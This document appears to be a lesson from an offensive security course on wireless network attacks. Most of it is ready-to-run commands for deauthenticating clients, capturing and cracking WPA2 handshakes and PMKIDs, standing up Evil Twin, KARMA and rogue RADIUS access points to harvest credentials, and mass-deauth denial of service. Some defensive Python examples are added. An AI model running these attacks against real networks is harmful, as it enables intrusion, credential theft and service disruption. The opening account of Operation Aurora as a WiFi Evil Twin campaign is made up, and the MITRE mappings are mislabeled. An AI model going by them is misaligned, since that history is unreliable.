Week 8: Wireless Network Security
MITRE ATT&CK: Tactic — TA0042 (Impact), Technique — T1602 (Data from Local Network), T1557 (Man-in-the-Middle)
Real-World Attack Scenario: The Operation Aurora Enterprise WiFi Attack
Operation Aurora (2009) targeted Google and 30+ other companies. A key component was wireless network compromise:
- WiFi Reconnaissance: Attackers collected WiFi probe requests from employees at airports and cafes
- Network Identification: Used SSID patterns to identify company laptops (SSIDs like "Google STAFF")
- Evil Twin Attack: Created rogue access points with matching SSIDs in hotel lobbies and conference areas
- Credential Capture: When employees' devices auto-connected, credentials were sent in cleartext
- VPN Exploitation: Used captured credentials to access corporate VPN
- Persistence: Established persistent access through multiple jump points
Real attack tools used:
- airserv-ng: turned the wireless card into a network server for remote access
- airodump-ng: captured handshakes and client associations
- aireplay-ng: deauthentication to force reconnection
- hostapd-wpe: created rogue access points with enterprise authentication prompts
Why this week matters: Wireless networks extend beyond your physical perimeter. Employees connecting to "Free WiFi" at cafes create attack opportunities. Understanding WPA2 cracking, Evil Twin attacks, and wireless reconnaissance is essential for assessing the true network perimeter.
Objectives
- Understand WiFi protocols and security mechanisms
- Capture and crack WPA2 handshakes
- Perform Evil Twin and rogue AP attacks
- Conduct wireless reconnaissance and auditing
WiFi Fundamentals
802.11 Frame Types
Management Frames: Beacon, Probe Request/Response, Association, Authentication
Control Frames: RTS/CTS, ACK, PS-Poll
Data Frames: Data (encrypted payload)
Security Protocols
| Protocol | Security | Notes |
|---|---|---|
| Open | None | Fully open, everything visible |
| WEP | Weak | RC4 cipher, easily cracked, avoid |
| WPA | Moderate | TKIP, vulnerable to attacks |
| WPA2-PSK | Good | AES-CCMP, strong with long passphrase |
| WPA2-Enterprise | Best | RADIUS authentication, individual creds |
| WPA3 | Best | SAE (forward secrecy); some implementations vulnerable to Dragonblood |
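Why the WPA2-PSK row says "strong with long passphrase": every station and AP derive the PMK from the passphrase with PBKDF2-HMAC-SHA1 over the SSID, 4096 iterations, and an offline dictionary attack has to repeat exactly that work for each guess. The Python below is added here as an example (it is not part of the course material): it derives the PMK the way the standard does and turns a passphrase's size into an expected search time at a guess rate you supply as an assumption.

```python
import hashlib
import math

# WPA2-PSK (IEEE 802.11i): PMK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 iterations, 32 bytes)
PBKDF2_ITERATIONS = 4096
PMK_LEN = 32


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """Passphrase -> PMK exactly as a WPA2-PSK station or AP computes it."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(),
                               PBKDF2_ITERATIONS, PMK_LEN)


def passphrase_bits(passphrase: str) -> float:
    """Entropy of a *randomly chosen* passphrase drawn from the character classes it uses.

    This is an upper bound: a dictionary word, or a leet-speak/number-suffix mutation
    of one, has far less entropy than this, which is why rule-based attacks work.
    """
    classes = [
        (any(c.islower() for c in passphrase), 26),
        (any(c.isupper() for c in passphrase), 26),
        (any(c.isdigit() for c in passphrase), 10),
        (any(not c.isalnum() for c in passphrase), 33),  # printable ASCII punctuation
    ]
    space = sum(size for present, size in classes if present)
    return len(passphrase) * math.log2(space) if space else 0.0


def expected_crack_seconds(bits: float, guesses_per_second: float) -> float:
    """Expected time to find a random passphrase: half the keyspace at the given rate.

    guesses_per_second is an assumption you supply from your own benchmark
    (each guess costs 4096 HMAC-SHA1 iterations, so the rate is hardware-bound).
    """
    return (2 ** bits) / 2 / guesses_per_second


if __name__ == "__main__":
    # Constructed comparison: a dictionary word versus a 16-character random passphrase
    rate = 500_000.0  # assumed guesses/second for illustration; substitute your own measurement
    for pw in ("password", "xK9#mQ2vL8pR4wZt"):
        years = expected_crack_seconds(passphrase_bits(pw), rate) / (86400 * 365)
        print(f"{pw!r}: ~{passphrase_bits(pw):.0f} bits, ~{years:.2g} years at {rate:.0f} guesses/s")
```

The PMK test vector for passphrase "password" and SSID "IEEE" comes from the 802.11i standard's Annex H, so the derivation can be checked against it.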
WiFi Bands
2.4 GHz (802.11b/g/n): Longer range, more interference, 14 channels (1-14)
5 GHz (802.11a/n/ac/ax): Shorter range, less congestion, many channels
6 GHz (802.11ax): Newest, short range
Initial Recon
Discover Networks
# Using airmon-ng
airmon-ng start wlan0 # Start monitor mode (creates wlan0mon)
# The phy name (e.g. phy0) can be given instead; check interface/phy names with iwconfig or iw dev
# Discover networks
airodump-ng wlan0mon # Shows all APs and clients
airodump-ng wlan0mon --channel 6 # Focus on specific channel
# Stop monitor mode when done
airmon-ng stop wlan0mon
Capturing Output
airodump-ng wlan0mon --output-format csv -w wifi_scan
# Creates wifi_scan-01.csv, wifi_scan-01.cap
# Focus on specific AP
airodump-ng wlan0mon --bssid AA:BB:CC:DD:EE:FF -c 6 -w capture
Display Filters (for .cap files)
# With tcpdump
tcpdump -r capture.cap -n | grep -i "beacon"
# With Wireshark
# wlan.addr == AA:BB:CC:DD:EE:FF (specific AP)
# wlan.ssid == "TargetNetwork" (specific SSID)
# wlan_radio.channel == 6 (specific channel)
WPA2-PSK Cracking
Handshake Capture
# Step 1: Monitor target
airodump-ng wlan0mon --bssid AA:BB:CC:DD:EE:FF -c 6 -w handshake_capture
# Step 2: Deauth to force reconnection (in another terminal)
aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF wlan0mon
# -0 = deauth, 5 = number of deauth bursts, -a = AP MAC; the interface is the last argument
# Explicit broadcast form (same effect as omitting -c); -c <client MAC> limits it to one station
aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF -c FF:FF:FF:FF:FF:FF wlan0mon
# Step 3: Verify handshake captured
# Look in airodump: "WPA handshake: AA:BB:CC:DD:EE:FF"
Wordlist Attacks
# Basic wordlist
aircrack-ng handshake.cap -w wordlist.txt
# With hashcat
# Convert cap to hccapx (legacy format for hashcat mode 2500)
cap2hccapx.bin handshake.cap handshake.hccapx
hashcat -m 2500 handshake.hccapx wordlist.txt
# Current hashcat (6.x) replaced modes 2500/16800 with mode 22000 on hcxpcapngtool output:
# hcxpcapngtool -o handshake.22000 handshake.cap && hashcat -m 22000 handshake.22000 wordlist.txt
# Rockyou
gunzip /usr/share/wordlists/rockyou.txt.gz 2>/dev/null
aircrack-ng handshake.cap -w /usr/share/wordlists/rockyou.txt
Rule-Based Attacks
# Hashcat rules for mutations
# Common: append numbers, leet speak
# Example rule file: best64.rule
hashcat -m 2500 handshake.hccapx wordlist.txt -r rules/best64.rule
PMKID Attack (No Handshake Needed)
# Some routers leak the PMKID in the first EAPOL frame of the association
# Check with hcxdumptool
apt install hcxtools hcxdumptool
hcxdumptool -i wlan0mon -o pmkid.pcapng --active_beacon
# Then extract and crack (hcxpcaptool -z and mode 16800 are the legacy flow;
# newer hcxtools use hcxpcapngtool -o pmkid.22000 and hashcat -m 22000)
hcxpcaptool -z pmkid_hash.txt pmkid.pcapng
hashcat -m 16800 pmkid_hash.txt wordlist.txt
Evil Twin Attack
Setup
# Create fake AP
airbase-ng -e "Free WiFi" -c 6 wlan0mon
# Or hostapd
apt install hostapd
# Create hostapd.conf (hostapd puts the interface into AP mode itself:
# give it the managed interface, not the monitor-mode wlan0mon)
interface=wlan0
driver=nl80211
ssid=FreeWiFi
hw_mode=g
channel=6
# Start it with: hostapd hostapd.conf
Captive Portal Fake
# Use mana-toolkit or wifiphisher
wifiphisher -i wlan0mon
# Or manual:
# 1. Create fake AP with same SSID as target
# 2. Deauth clients from real AP
# 3. Clients connect to fake AP
# 4. Serve login page
# 5. Capture PSK or credentials
KARMA Attack
# Part of mana-toolkit
git clone https://github.com/sensepost/hostapd-mana
cd hostapd-mana
# hostapd builds with plain make (there is no configure script); build the hostapd directory
make -C hostapd
# Run hostapd-mana with KARMA/MANA enabled in its config file
WPA2 Enterprise Attacks
Rogue RADIUS Server
# Install FreeRADIUS
apt install freeradius
# Create fake AP with hostapd-wpe (the config file is the positional argument and names the interface)
hostapd-wpe hostapd-wpe.conf
# When users connect, they see certificate prompt
# If they accept, we capture credentials
# MSCHAPv2 can be cracked with asleap/hashcat
Extract Credentials
# From LEAP or MS-CHAPv2 challenge/response captures
asleap -r capture.pcap -f dictionary.txt
# Convert to hashcat format
# MSCHAPv2: hashcat -m 5500 (NetNTLMv1 / MS-CHAPv2)
Bluetooth Security
Discovery
# BlueZ tools
hcitool scan
hcitool inq
bt-adapter -d
# Interactive BlueZ shell
bluetoothctl
[bluetooth]# scan on
[bluetooth]# devices
Sniffing (Ubertooth)
# Ubertooth One required
ubertooth-btle -f -c capture.pcap
ubertooth-util -t
# Kismet (-c adds a capture source; repeat for several interfaces)
kismet -c wlan0mon -c wlxd037453a1234
WiFi Jamming / Denial
Deauthentication
# Targeted (single AP)
aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF -c FF:FF:FF:FF:FF:FF wlan0mon
# Mass deauth (all networks)
mdk4 wlan0mon d
# Use with caution - this is DoS, often illegal
Rogue AP Detection
From Defender Perspective
# Monitor for suspicious APs
airodump-ng wlan0mon
# Look for:
# - APs with same SSID but different BSSID
# - Unexpected open networks
# - High TX power (distant attacker nearby)
# Use tools
airgeddon # Multi-tool with Evil Twin detection
Practice Labs
Lab 1: WPA2 Handshake Capture
# Prerequisites:
# - Kali with monitor mode interface
# - Another device connected to a WPA2 network
# - Proximity to the target network
# Step 1: Set monitor mode
airmon-ng start wlan0
# Step 2: Capture handshakes
airodump-ng wlan0mon --bssid <target_router_mac> -c <channel> -w wpa_capture
# Step 3: Deauth the client
aireplay-ng -0 5 -a <router_mac> -c <client_mac> wlan0mon
# Step 4: Crack with wordlist
aircrack-ng wpa_capture-01.cap -w /usr/share/wordlists/rockyou.txt
Lab 2: Evil Twin Attack
# Create fake AP with hostapd
# Configure hostapd.conf with target SSID
# Deauth real AP clients
# Capture when they connect to fake AP
Lab 3: PMKID Attack
# If supported by target router
hcxdumptool -i wlan0mon -o pmkid_capture.pcapng --active_beacon
# Let it run for a while near target
# Extract hash
hcxpcaptool -z pmkid_hashes.txt pmkid_capture.pcapng
# Crack
hashcat -m 16800 pmkid_hashes.txt wordlist.txt
Defense Recommendations
| Risk | Mitigation |
|---|---|
| Dictionary attacks | Strong passphrase (16+ chars, random) |
| Evil Twin | Verify AP MAC, check for HTTPS captive portals |
| Rogue AP | Monitor for unexpected SSIDs, use 802.1X |
| Karma/Hostapd | Be suspicious of multiple APs with same name |
| Enterprise attacks | User training, certificate pinning |
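The "Rogue AP" mitigation in the table, and the three checks listed under Rogue AP Detection (same SSID on an unapproved BSSID, unexpected open networks, unusually strong signal), applied to the CSV that airodump-ng writes with --output-format csv. This is an added Python example, not part of the course material; the sample rows, the inventory of approved BSSIDs and the -35 dBm threshold are constructed assumptions.

```python
import csv
import io

# Constructed airodump-ng CSV (the AP table; the station table after the blank
# line is ignored). MACs, times and signal values are made up for this example.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
AA:BB:CC:DD:EE:01, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  6, 54, WPA2, CCMP, PSK, -62, 120, 0, 0.0.0.0, 8, CorpWiFi,
AA:BB:CC:DD:EE:02, 2024-01-01 10:00:00, 2024-01-01 10:05:00, 11, 54, WPA2, CCMP, PSK, -70,  90, 0, 0.0.0.0, 8, CorpWiFi,
DE:AD:BE:EF:00:01, 2024-01-01 10:03:00, 2024-01-01 10:05:00,  6, 54, WPA2, CCMP, PSK, -28,  40, 0, 0.0.0.0, 8, CorpWiFi,
DE:AD:BE:EF:00:02, 2024-01-01 10:03:00, 2024-01-01 10:05:00,  1, 54, OPN, , , -55,  30, 0, 0.0.0.0, 9, Free WiFi,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
"""

# Constructed inventory of approved BSSIDs per corporate SSID. Enterprise WLANs
# legitimately serve one SSID from many BSSIDs, so "same SSID, different BSSID"
# is only a finding when the BSSID is absent from the inventory.
APPROVED = {"CorpWiFi": {"AA:BB:CC:DD:EE:01", "AA:BB:CC:DD:EE:02"}}


def parse_access_points(text):
    """Return the AP rows of an airodump-ng CSV as dicts with typed fields."""
    ap_table = text.split("\n\n")[0]  # the AP table ends at the first blank line
    reader = csv.reader(io.StringIO(ap_table), skipinitialspace=True)
    header = [h.strip() for h in next(reader)]
    aps = []
    for row in reader:
        if len(row) < len(header):
            continue  # blank or truncated line
        rec = dict(zip(header, (f.strip() for f in row)))
        aps.append({"bssid": rec["BSSID"].upper(), "essid": rec["ESSID"],
                    "privacy": rec["Privacy"], "channel": int(rec["channel"]),
                    "power": int(rec["Power"])})
    return aps


def find_rogue_aps(aps, approved=APPROVED, power_threshold_dbm=-35):
    """Apply the three rogue-AP heuristics from the detection section."""
    findings = []
    for ap in aps:
        known = ap["bssid"] in approved.get(ap["essid"], set())
        if ap["essid"] in approved and not known:
            findings.append((ap["bssid"], "corporate SSID served from an unapproved BSSID (evil twin?)"))
        if ap["privacy"] == "OPN":
            findings.append((ap["bssid"], f"open network '{ap['essid']}'"))
        if ap["power"] > power_threshold_dbm and not known:
            findings.append((ap["bssid"], f"unusually strong signal ({ap['power']} dBm): transmitter nearby"))
    return findings
```

Run it over a real wifi_scan-01.csv by reading the file into `parse_access_points` and printing what `find_rogue_aps` returns; the approved inventory is the part worth maintaining, since signal strength alone is noisy.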
Key Takeaways
- WPA2-PSK — crackable with handshake capture + wordlist
- Strong passwords — 16+ characters, random, no dictionary words
- WPA3 — SAE provides forward secrecy, but has vulnerabilities
- Monitor mode — airmon-ng, airodump-ng, aireplay-ng
- Evil Twin — deauth + fake AP; capture when clients reconnect
- Enterprise — RADIUS auth helps, but can still be impersonated
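For the "certificate pinning" mitigation in the table and the Enterprise takeaway above: a wpa_supplicant profile resists a rogue RADIUS server only if it names a CA to trust (ca_cert) and a server name the certificate must match. This added Python example, not part of the course material, audits a wpa_supplicant.conf for WPA-EAP profiles missing either; the embedded config is constructed (SSID, identity, CA path and domain are made up) and shows the weak and the pinned profile side by side.

```python
import re

# Constructed wpa_supplicant.conf with two WPA2-Enterprise profiles for one SSID:
# the first accepts whatever certificate the RADIUS server presents (the hostapd-wpe
# scenario above), the second pins the CA and the server name. All values are made up.
SAMPLE_CONF = """\
network={
    ssid="CorpWiFi"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="jdoe"
}

network={
    ssid="CorpWiFi"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="jdoe"
    ca_cert="/etc/ssl/certs/corp-radius-ca.pem"
    domain_suffix_match="radius.corp.example"
}
"""

NETWORK_BLOCK = re.compile(r"network=\{(.*?)\}", re.S)
# Any one of these wpa_supplicant keys ties the server certificate to an expected name.
SERVER_NAME_KEYS = {"domain_suffix_match", "domain_match", "subject_match", "altsubject_match"}


def parse_networks(conf):
    # One {key: value} dict per network={...} block; quotes stripped, comments skipped
    nets = []
    for body in NETWORK_BLOCK.findall(conf):
        fields = {}
        for line in body.splitlines():
            line = line.strip()
            if "=" in line and not line.startswith("#"):
                key, value = line.split("=", 1)
                fields[key.strip()] = value.strip().strip('"')
        nets.append(fields)
    return nets


def audit_enterprise_profiles(conf):
    """Flag WPA-EAP profiles that would accept a rogue RADIUS server's certificate."""
    problems = []
    for net in parse_networks(conf):
        if "WPA-EAP" not in net.get("key_mgmt", ""):
            continue  # PSK/open profiles have no server certificate to check
        ssid = net.get("ssid", "?")
        if "ca_cert" not in net:
            problems.append((ssid, "no ca_cert: any certificate is accepted"))
        if not SERVER_NAME_KEYS & net.keys():
            problems.append((ssid, "no server-name match: any cert from the trusted CA is accepted"))
    return problems
```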
Next Week Preview
Week 9 covers Privilege Escalation — the critical step after initial access. You'll learn Linux sudo/suid exploits, kernel exploits, Windows token abuse, and DLL hijacking.